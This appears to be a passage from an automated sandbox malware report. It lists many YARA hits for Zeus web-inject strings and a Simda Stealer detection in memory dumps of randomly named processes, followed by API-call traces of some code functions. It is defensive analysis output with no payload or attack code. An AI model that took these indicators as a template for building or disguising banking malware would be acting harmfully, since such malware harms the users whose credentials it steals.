    Source: 2.3.svchost.exe.2c70000.52.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.51.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.21.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.35.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.3.arxtPs1STE.exe.781218.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.2.arxtPs1STE.exe.407000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.46.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.25.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.889000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.3.arxtPs1STE.exe.77b218.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 31.2.tGYLgZxMWmmBTD.exe.2d60000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.42.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 17.2.tGYLgZxMWmmBTD.exe.e70000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 6.2.tGYLgZxMWmmBTD.exe.880000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.47.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.39.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.48.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.20.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.888400.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.2.arxtPs1STE.exe.406400.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.15.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.27.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.34.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 5.2.tGYLgZxMWmmBTD.exe.8d0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2ab0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 39.2.tGYLgZxMWmmBTD.exe.28f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.43.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 9.2.tGYLgZxMWmmBTD.exe.2bd0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.3f90000.18.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1857902418.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0000001F.00000002.1890678971.00000000029B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1843970657.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1887006927.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1889204820.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1897674355.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1899518628.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000027.00000002.1908352092.00000000028F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000014.00000002.1811513588.0000000002560000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1936749953.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000006.00000002.1844458477.0000000000820000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1802342422.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000009.00000002.1857835167.00000000027C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1892734452.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1937280291.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1832269912.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1900019972.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000009.00000002.1859321562.0000000002BD0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1893633503.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000016.00000002.1814429100.0000000001220000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1403293254.0000000000883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1919368621.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1781590454.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1931753545.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000002.2654834253.0000000002A56000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1407157898.0000000002AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1892977069.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1771500442.0000000004190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000002.2655337628.0000000002C13000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1893366330.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1900579687.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0000000D.00000002.1864825235.0000000000D70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000014.00000002.1809736468.0000000002170000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000002.2654834253.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1788047378.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1896507148.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1937495676.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1892490476.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1808599127.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1910755217.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000018.00000002.1872752662.0000000000A30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1888344420.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1917963207.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1751304205.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1931351798.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1931013445.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1402494872.0000000000883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1931983270.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0000001A.00000002.1838904239.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1899806491.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1918926192.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1819482254.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1898993550.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1900285726.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1875983940.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000022.00000002.1919595262.0000000002740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0000001D.00000002.1881382385.0000000000A40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000016.00000002.1814626114.0000000001280000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0000000D.00000002.1866051279.0000000000DD0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1932199583.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000011.00000002.1804322257.0000000000E10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0000001D.00000002.1882257401.0000000000AA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1891958770.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000022.00000002.1920132875.0000000002A20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1918440128.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000027.00000002.1907577996.0000000000CB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000018.00000002.1872402689.00000000009D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1887697552.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0000001F.00000002.1891163811.0000000002D60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000000.00000003.1390809231.000000000077B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1892177129.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1885549848.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000011.00000002.1805040996.0000000000E70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1893840816.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0000001A.00000002.1839056548.0000000001340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1755207141.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000002.00000003.1936460278.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000005.00000002.1829128656.00000000008D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000006.00000002.1844914899.0000000000880000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000005.00000002.1828939687.0000000000870000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: arxtPs1STE.exe PID: 7600, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: svchost.exe PID: 7652, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7376, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7352, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7328, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7304, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7280, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7256, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7232, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7212, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7188, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 344, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 3964, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 1080, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 3872, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Yara detected Simda Stealer
    Source: Yara matchFile source: 2.3.svchost.exe.883000.4.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.2.arxtPs1STE.exe.400000.2.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.3.svchost.exe.883000.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.2.arxtPs1STE.exe.400000.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.3.arxtPs1STE.exe.77b218.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000002.00000003.1403293254.0000000000883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000003.1402494872.0000000000883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.1390809231.000000000077B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: arxtPs1STE.exe PID: 7600, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7652, type: MEMORYSTR
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB3A20 VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,2_2_02BB3A20
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB79E0 NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,_snprintf,memset,_snprintf,OpenMutexA,2_2_02BB79E0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008D3A20 LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,5_2_008D3A20
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_00883A20 LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,6_2_00883A20
